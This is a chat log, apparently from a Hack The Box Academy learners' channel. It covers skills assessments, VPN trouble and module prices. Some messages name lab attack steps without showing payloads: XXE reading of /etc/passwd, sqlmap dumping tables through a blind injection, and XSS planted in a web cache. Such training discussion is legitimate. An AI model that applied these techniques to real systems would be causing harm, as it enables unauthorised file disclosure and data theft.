Do I then also have to do all steps of the skills assignments of this page:
https://academy.hackthebox.com/module/148/section/3954 ??
yes
also so all the tasks ?
How do I then know I do a good job ??
oke
so the last few
on not these steps:
Triage the alerts
TheHive is loaded with alerts related to the Insights Nexus breach. You are requested to triage them, starting with:
Task 1: Create a new case in TheHive. Find all the alerts that are specific to the Insights Nexus breach scenario, and link the alerts in the case. This exercise introduces you to work in TheHive alerts and cases.
Yes it relates to it
also those aren't steps; those are 'tasks'
Tasks being specific goals
The assessments are meant to test the knowledge you have gained while working through the module and sections. They are meant to be part of the module as a whole. Unsure what you mean by self learning the course, as the modules through the course essentially drive you to do just that.. self learn.
Most modules and sections conclude with an interaction portion that allows you to test what you have learned against a practical exercise pertaining to the module / section.
I'd highly recommend following the module content regardless of whether you've studied the subject elsewhere tbh
Always more to learn 🙂
Good luck!
Thanks
I hope tomorrow the vpn link is more stable
I get a lot of connection timeout messages
If you continue to have VPN issues, please do ask for support 🙂
Need some help? Learn how to reach the support team on Academy.
All you need to know about the VPN Connection for Academy
I give it up for today
I try to add something to the comments
and see a message : cannot access property data: e,response is undefined
Are you using the pwnbox at the same time you're using the VPN?
nope
To quote SuperNuts: Just say the module/section/question you're stuck on, what you tried, any errors, more info, etc. without revealing content from modules above tier 0 and someone may be able to help
That doesn't look like a VPN error
I'm not Marcie!!
Wait
and as far as I can see I use also one VPN
Sorry SuperNuts
I will try tomorrow and deleted all the old imported vpn files
lol i'm sure Marcie said the same thing at one point
to be fair; we said basically the same thing
MarcieLee also said: the best way to get help here is to provide the module name, section name, and what you're stuck on. (link to the module is a plus)
and I said it one message later
yarp
therefore I said it first
For now GN
It is here 22:28 so late for me
@acoustic briar Please take care not to post content from modules above tier 0. Yes, it worked when I did it. Make sure to read the whole section carefully, including the callouts in the Note: section...
Sorry about that. So for reference, if someone may be able to help me this is about Web Attacks -> XXE -> Advanced File Disclosure with CDATA. I did read the notes, but I'm just trying to read /etc/passwd which is not a self reference and should not contain any weird characters. I can read the file fine with the other techniques
i tried it on /etc/hosts personally, worked for me
ok, indeed with /etc/hosts it works. I will investigate this, thanks!
My best guess is length limitations although that is not really mentioned for this method.
anyone has done the skill assessment for Sqlmap ? So far I found the time-based blind in the "id" parameter when trying to add to cart, but it keeps saying that it is unable to retrieve data from the tables when I specify --tables --dump
For this: https://academy.hackthebox.com/module/115/section/1139 seems like the parrot OS target does not have a web browser installed except line2. is this expected?
Try multitude of bypasses together
Hello buddies.
I encountered a problem during the final skills assessment in the <Abusing HTTP Misconfigurations> module: Nothing changed after I tried to inject the XSS payload into the web cache.
And note that the official answer is: "After waiting for a few seconds, students will notice that the admin has triggered the XSS payload". But several minutes have passed, and nothing has changed now (I still don't get the admin permission).
So what's happened, buddies? How can we resolve this puzzling problem?
oh yea forgot that's a thing, thank
I did come across this - you still working on this or ? feel free to DM me - we can work this together if you want
firefox 😉
module price is insane now
agreed the value is insane for the content
3400 cubes for WiFi pentester path? give me a break, i know most of it without paying a cent
you can have your opinion, i don't really see any other platform beating the value still
and you can learn anything without paying a cent
i think there's nothing like experience, actually doing it. if you don't pay anything you can't really do it. you at minimum need a few wireless adapters capable of monitor mode and a few wireless networks to attack. the wifi cyberlabs are pretty awesome, it gives you that experience too. it can be a lot more convenient for someone to learn through a course.
You can sign up for an annual subscription at any time and get immediate access to all modules in the Job Role Paths. There is currently a discount promotion (25% off).
I think the price is more than fair.
Content may be good but the money power is crazy low now, the whole cybersec industry is just milking ppl now, i remember times when modules were 1/5 that price or even entirely free, and we are never going back to that
i have never seen them change the price of modules...
